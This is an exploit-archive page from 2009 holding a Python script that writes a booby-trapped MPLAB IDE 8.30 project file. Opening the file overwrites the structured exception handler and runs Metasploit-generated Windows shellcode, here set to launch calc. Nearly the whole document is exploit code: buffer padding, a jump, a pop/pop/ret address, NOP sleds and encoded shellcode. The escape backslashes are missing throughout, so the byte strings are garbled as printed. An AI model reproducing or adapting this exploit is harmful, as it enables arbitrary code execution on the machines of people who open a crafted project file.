MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit
# Published : 2009-05-11
# Author : His0k4
# Previous Title : CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit
# Next Title : EasyPHP 3.0 Arbitrary Modify Configuration File Vulnerability

# usage: mplab.py then open the project file :)
# Download : http://ww1.microchip.com/downloads/en/DeviceDoc/MPLAB_8.30.zip (nadli chouk fi rassi :p)
print "**************************************************************************"
print " MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploitn"
print " Refer : Secunia advisory (35054)n"
print " Exploit code: His0k4n"
print " Tested on: Windows XP Pro SP3 (EN)n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.comn"
print "**************************************************************************"
         	

header1 = (
"x5bx48x45x41x44x45x52x5dx0dx0ax6dx61x67x69x63x5f"
"x63x6fx6fx6bx69x65x3dx7bx36x36x45x39x39x42x30x37"
"x2dx45x37x30x36x2dx34x36x38x39x2dx39x45x38x30x2d"
"x39x42x32x35x38x32x38x39x38x41x31x33x7dx0dx0ax66"
"x69x6cx65x5fx76x65x72x73x69x6fx6ex3dx31x2ex30x0d"
"x0ax5bx50x41x54x48x5fx49x4ex46x4fx5dx0dx0ax64x69"
"x72x5fx73x72x63x3dx0dx0ax64x69x72x5fx62x69x6ex3d"
"x0dx0ax64x69x72x5fx74x6dx70x3dx0dx0ax64x69x72x5f"
"x73x69x6ex3dx0dx0ax64x69x72x5fx69x6ex63x3dx0dx0a"
"x64x69x72x5fx6cx69x62x3dx0dx0ax64x69x72x5fx6cx6b"
"x72x3dx0dx0ax5bx43x41x54x5fx46x49x4cx54x45x52x53"
"x5dx0dx0ax66x69x6cx74x65x72x5fx73x72x63x3dx2ax2e"
"x61x73x6dx0dx0ax66x69x6cx74x65x72x5fx69x6ex63x3d"
"x2ax2ex68x3bx2ax2ex69x6ex63x0dx0ax66x69x6cx74x65"
"x72x5fx6fx62x6ax3dx2ax2ex6fx0dx0ax66x69x6cx74x65"
"x72x5fx6cx69x62x3dx2ax2ex6cx69x62x0dx0ax66x69x6c"
"x74x65x72x5fx6cx6bx72x3dx2ax2ex6cx6bx72x0dx0ax5b"
"x53x55x49x54x45x5fx49x4ex46x4fx5dx0dx0ax73x75x69"
"x74x65x5fx67x75x69x64x3dx7bx36x42x33x44x41x41x37"
"x38x2dx35x39x43x31x2dx34x36x44x44x2dx42x36x41x41"
"x2dx44x42x44x41x45x34x45x30x36x34x38x34x7dx0dx0a"
"x73x75x69x74x65x5fx73x74x61x74x65x3dx0dx0ax5bx54"
"x4fx4fx4cx5fx53x45x54x54x49x4ex47x53x5dx0dx0ax54"
"x53x7bx42x46x44x32x37x46x42x41x2dx34x41x30x32x2d"
"x34x43x30x45x2dx41x35x45x35x2dx42x38x31x32x46x33"
"x45x37x37x30x37x43x7dx3dx2fx6fx22")

header2 = (
"x2ex63x6fx66x22x0dx0ax54x53x7bx41x44x45x39x33x41"
"x35x35x2dx43x37x43x37x2dx34x44x34x44x2dx41x34x42"
"x41x2dx35x39x33x30x35x46x37x44x30x33x39x31x7dx3d"
"x0dx0a")


# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x79"
"x1fx8cx11x83xebxfcxe2xf4x85xf7xc8x11x79x1fx07x54"
"x45x94xf0x14x01x1ex63x9ax36x07x07x4ex59x1ex67x58"
"xf2x2bx07x10x97x2ex4cx88xd5x9bx4cx65x7exdex46x1c"
"x78xddx67xe5x42x4bxa8x15x0cxfax07x4ex5dx1ex67x77"
"xf2x13xc7x9ax26x03x8dxfaxf2x03x07x10x92x96xd0x35"
"x7dxdcxbdxd1x1dx94xccx21xfcxdfxf4x1dxf2x5fx80x9a"
"x09x03x21x9ax11x17x67x18xf2x9fx3cx11x79x1fx07x79"
"x45x40xbdxe7x19x49x05xe9xfaxdfxf7x41x11xefx06x15"
"x26x77x14xefxf3x11xdbxeex9ex7cxedx7dx1ax1fx8cx11")
	
buff = "x41" * (226-len(shellcode))
next_seh = "x74xc9x41x42"
seh = "x12x13x40x00" #p/p/r MPLAB.exe
nops1 = "x90"*20
nops2 = "x90"*28
mshellcode = "xE9x47xFFxFFxFF" #welli 3liya :p

exploit = header1 + buff + shellcode + nops1 + mshellcode + nops2 + next_seh + seh + header2

try:
    out_file = open("exploit.mcp",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("nExploit file created!n")
except:
    print "Error"

# www.Syue.com [2009-05-11]